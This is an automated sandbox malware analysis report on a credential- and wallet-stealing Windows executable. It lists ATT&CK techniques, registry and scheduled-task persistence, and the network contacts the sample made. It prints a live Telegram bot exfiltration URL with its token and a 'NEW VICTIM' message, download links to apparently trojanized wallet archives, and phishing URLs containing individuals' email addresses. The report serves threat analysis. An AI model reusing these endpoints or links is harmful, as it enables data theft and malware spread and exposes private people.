Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	1 Process Injection	1 Obfuscated Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 File Deletion	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	113 Masquerading	LSA Secrets	1 Network Share Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Process Injection	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	63%	ReversingLabs	Win32.Ransomware.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\Windows Media Player\graph\graph.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://drive.google.co	0%	Avira URL Cloud	safe
https://clients2.goo	0%	Avira URL Cloud	safe
https://drive-daily-2.corp.google.co	0%	Avira URL Cloud	safe
https://drive-staging.corp.google.co	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ipinfo.io	34.117.59.81	true	false	high
drive.google.com	172.217.17.46	true	false	high
drive.usercontent.google.com	142.250.181.65	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
api.telegram.org	149.154.167.220	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML	false		high
https://ipinfo.io/json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/missingauth	file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, json[1].json.2.dr, json[1].json.0.dr	false		high
https://api.telegram.org/bot	file.exe	false		high
https://drive.google.com/w	file.exe, 00000000.00000003.1441377935.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1463728013.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.000002321892D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/uc?id=URL:	file.exe	false		high
https://payments.google.com/payments/v4/js/integrator.js313AE9E	file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonN/Aipcountry	file.exe	false		high
https://drive.usercontent.google.com/T)	file.exe, 00000002.00000003.1464989617.0000012D10359000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	false		high
https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down	file.exe	false		high
https://api.telegram.org/botFailed	file.exe	false		high
https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip	file.exe	false		high
https://docs.google.com/	file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-staging.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/.d	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/J	file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonbd	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.co	file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstorem	file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/;T	file.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361147206.0000012D10318000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/load_g	file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmp	false		high
https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down	file.exe	false		high
https://ipinfo.io/W	file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreRc	file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D1032F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonJd	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/dentifier	file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	false		high
https://clients2.goo	file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o	file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/jsonFd	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d	file.exe	false		high
https://api.telegram.org/-	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js00F7FC9	file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/S	file.exe, 00000000.00000003.1463728013.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-autopush.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js	file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-4.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/2	file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreh	file.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	file.exe, 00000002.00000003.1464255067.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/uc?id=	file.exe	false		high
https://chrome.google.com/webstoreQ	file.exe, 00000000.00000003.1353932053.0000023218926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353955254.0000023218931000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/i	file.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/F	file.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/Agent:	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.jsF6DFAA4C	file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270	file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/p	file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore3D	file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d	file.exe	false		high
https://api.telegram.org/nd	file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/	file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10369000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-6.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-0.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/t-477772811-jspb	file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-preprod.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/om/	file.exe, 00000000.00000003.1354165171.00000232188F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-staging.corp.google.co	file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore/	file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/	file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.co	file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353831153.00000232188F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore7	file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D10311000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-3.corp.google.com/	file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/&	file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.217.17.46	drive.google.com	United States	15169	GOOGLEUS	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.250.181.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573853
Start date and time:	2024-12-12 16:52:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal80.troj.spyw.winEXE@8/9@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 124
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
10:54:23	API Interceptor	15836x Sleep call for process: graph.exe modified
15:53:39	Task Scheduler	Run new task: MyBootTask path: C:\Users\user\Desktop\file.exe
15:53:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
15:54:01	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse
	Message_2712729.eml	Get hash	malicious	unknown	Browse
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
34.117.59.81	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	34.117.59.81
	http://enteolcl.top/	Get hash	malicious	Unknown	Browse	34.117.59.81
	Product Blueprint..html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9	Get hash	malicious	Unknown	Browse	34.117.59.81
	zW72x5d91l.bat	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	eEiHdLSfum.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	eEiHdLSfum.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
s-part-0035.t-0009.t-msedge.net	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	ICK6LzM018.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	download.ps1	Get hash	malicious	Unknown	Browse	13.107.246.63
	Passenger Itinerary.vbs	Get hash	malicious	Unknown	Browse	13.107.246.63
	Payment Advice-Dec-2024.vbs	Get hash	malicious	Unknown	Browse	13.107.246.63
	ZzS8KjNjr7.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	13.107.246.63
	Szi2WJUKmv.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	13.107.246.63
	aYxpioi6G3.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	PGkSZbFKmI.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	13.107.246.63
api.telegram.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Message_2712729.eml	Get hash	malicious	unknown	Browse	149.154.167.220
